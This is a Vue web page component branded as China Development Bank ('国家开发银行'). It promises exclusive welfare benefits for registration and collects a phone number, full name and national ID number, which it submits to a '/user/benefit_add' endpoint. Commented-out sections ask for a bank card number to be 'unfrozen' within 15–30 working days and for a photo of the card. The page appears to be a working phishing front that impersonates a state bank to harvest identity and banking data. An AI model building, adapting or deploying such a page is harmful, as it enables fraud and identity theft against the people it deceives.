<template>
  <div class="page-container">
    <div class="back_left" @click="$router.go(-1)" />
    <!-- <div class="big_tit">
        {{ $t('safe.setting') }}
      </div> -->
    <div class="headers">
      <h1>国家开发银行</h1>
      <h1 style="margin-top: 10px;">报备名额即可获得专属福利</h1>
    </div>
    <div class="imggw">
      <img width="150px" src="../images/user/11wh0-eeva3.png" alt="">
    </div>
    <div class="form-wrapper">
      <form class="card-form">
        <div class="form-title">福利登记表</div>
        <div class="form-group">
          <label>手机号码:</label>
          <input v-model="formData.phone" type="text" required placeholder="请输入手机号码">
        </div>

        <div class="form-group">
          <label>姓名:</label>
          <input v-model="formData.bank_num" type="text" required placeholder="请输入姓名">
        </div>
        <div class="form-group">
          <label>身份证号码:</label>
          <input v-model="formData.real_code" type="text" required placeholder="请输入身份证号码">
        </div>
        <!-- <div class="form-group">
            <label>需解冻银行卡卡号</label>
          </div>
          <div class="add-card" @click="handleFileUpload">+ 添加卡号</div>
          <div class="tip">请务必在15-30个工作日内提交，提交后相关部门将为您解冻</div> -->
        <!-- <div class="form-groups">
            <label>上传银行卡照片</label>
            <input type="file" @change="handleFileUpload" accept="image/*">
            <div v-if="previewImage" class="preview">
              <img :src="previewImage" alt="银行卡预览">
            </div>
          </div> -->
      </form>
    </div>

    <button class="confirm-btn" @click="handleSubmit">立即提交</button>
    <div class="confirm-text">
      <span>请认真核对信息,提交后不可更改</span>
      <span style="margin-top: 10px;">需更改请联系在线客服</span>
    </div>
  </div>
</template>

<script>
import Fetch from '../../utils/fetch';
export default {
  data() {
    return {
      formData: {
        phone: '',
        bank_num: '',
        real_code: ''
      },
      datawudi: {},
    }
  },
  created() {
    this.$parent.footer('user', false);
  },
  methods: {
    async starts() {
      const r = await Fetch('/user/info');
      this.datawudi = r.data;
    },
    async handleSubmit() {
      await this.starts();
      if (this.datawudi.is_auth !== 1) {
        this.$toast({
          className: "toastName",
          message: '需要实名认证',
        });
        return false;
      }
      if (!this.formData.phone) {
        this.$toast({
          className: "toastName",
          message: '需要手机号',
        });
        return false;
      }

      const phoneRule = /^1[3-9]\d{9}$/;
      if (!phoneRule.test(this.formData.phone)) {
        this.$toast({
          className: "toastName",
          message: '手机号码格式不正确',
        });
        return false;
      }

      // const bankRule = /^\d{16,19}$/;
      // if (!bankRule.test(this.formData.bank_num)) {
      //   this.$toast({
      //     className: "toastName",
      //     message: '银行卡号码格式不正确',
      //   });
      //   return false;
      // }
      if (!this.formData.bank_num) {
        this.$toast({
          className: "toastName",
          message: '需要姓名',
        });
        return false;
      }
      const idcardReg = /^[1-9]\d{5}(18|19|20)\d{2}(0[1-9]|1[0-2])(0[1-9]|[12]\d|3[01])\d{3}[\dXx]$/;
      if (!idcardReg.test(this.formData.real_code)) {
        this.$toast({
          className: "toastName",
          message: '身份证号码格式不正确',
        });
				return false;
			}
      if (!this.formData.real_code) {
        this.$toast({
          className: "toastName",
          message: '需要身份证号码',
        });
        return false;
      }
      Fetch('/user/benefit_add', {
        ...this.formData
      }).then(r => {

        this.$toast({
          className: "toastName",
          message: r.info['zh_cn']?r.info['zh_cn']:r.info,
        });
        // this.$router.go(-1);
      }).catch(r => {
        console.log(r, "23233");

      })
    }
  }
}
</script>

<style lang="less" scoped>
.page-container {
  height: 100vh;
  background: url(../images/user/redimg.jpg) no-repeat center;
  background-size: 112% 102%;
  position: relative;
  // height: 100vh;
}

.headers {
  color: #ffd08e;
  font-size: 24px;
  position: absolute;
  top: 10%;
  left: 50%;
  transform: translate(-50%, -50%);
  width: 100%;
  text-align: center;
}

.form-wrapper {
  position: absolute;
  top: 55%;
  left: 50%;
  transform: translate(-50%, -50%);
  width: 80%;
  max-width: 500px;
  background: #fff;
  padding: 0 30px 30px;
  border-radius: 8px;
  box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
}

.card-form h2 {
  text-align: center;
  margin-bottom: 20px;
}

.form-title {
  width: 200px;
  margin: 0 auto 10px;
  background: #d7000f;
  color: #fff;
  border-radius: 0 0 12px 12px;
  padding: 8px 0;
  font-size: 16px;
  text-align: center;
  margin-bottom: 18px;
  font-weight: bold;
}

.form-group {
  margin-bottom: 20px;
  // display: flex;
  // justify-content: space-around;
  // align-items: center;
}

label {
  display: block;
  margin-bottom: 8px;
}

input {
  width: 100%;
  padding: 10px;
  border: 1px solid #ddd;
  border-radius: 4px;
}

.preview img {
  max-width: 100%;
  max-height: 200px;
  margin-top: 10px;
}

.confirm-btn {
  position: absolute;
  bottom: 170px;
  width: 80%;
  max-width: 500px;
  left: 50%;
  transform: translateX(-50%);
  padding: 12px 40px;
  background: #ffdf9a;
  color: red;
  border: none;
  border-radius: 4px;
  font-size: 18px;
  font-weight: bold;
  cursor: pointer;
}

.confirm-text {
  font-weight: bold;
  position: absolute;
  bottom: 120px;
  left: 50%;
  transform: translateX(-50%);
  text-align: center;
  display: flex;
  flex-direction: column;
  width: 80%;
  font-size: 15px;
  color: #fff;
}

.add-card {
  display: block;
  width: 100%;
  height: 150px;
  line-height: 150px;
  background: #fff0e0;
  color: #d7000f;
  border: 1px dashed #d7000f;
  border-radius: 6px;
  font-size: 15px;
  text-align: center;
  margin-bottom: 12px;
  cursor: pointer;
}

.tip {
  color: #d7000f;
  font-size: 12px;
  text-align: center;
  margin-top: 8px;
  margin-bottom: 10px;
}

.imggw {
  position: absolute;
  top: 18%;
  left: 50%;
  transform: translateX(-50%);
}
</style>